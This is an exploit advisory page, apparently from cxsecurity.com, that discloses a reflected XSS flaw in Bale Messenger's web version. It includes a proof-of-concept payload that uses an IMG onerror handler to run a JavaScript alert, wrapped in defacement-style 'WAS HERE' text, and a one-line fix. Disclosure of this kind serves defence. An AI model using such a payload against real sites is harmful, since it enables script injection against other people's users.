Bale Messenger Web Version XSS ( Reflected ) Vulnerability

2018.07.13
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Bale Messenger Web Version XSS ( Reflected ) Vulnerability [+] Date : 2018-07-13 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : https://bale.ai/ [+] Dork : N/A [+] My Site : http://4rtxtnk7o5yt3mfw.onion/ [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Description : [!] Bale is An extremely powerful and popular instant messenger [!] Bale Has three versions of the desktop - Web and mobile. [!] More than 100,000 users use it in Iran You can Download it from App Store And bazar [+] Poc : [+] Video : [!] https://youtu.be/z3ZnDPct72U [!] Copy the payload code and save in the xml Or xss format. [!] Payload : <html> <note> <to>Mafia Boys</to> <from>0P3N3R</from> <heading>0P3N3R WAS HERE! Tnx : Ebrahim Vaker</heading> <body><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img></body> </note> </html> [+] Security Level : [!] Low [+] Exploitation Technique: [!] LOCAL [+] Request Method : [!] POST [+] Vulnerability Files : [!] Index [+] Fix : [!] Restrict user input or replace bad characters [+] We Are : [+] 0P3N3R [+] Ebrahim_Vaker


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top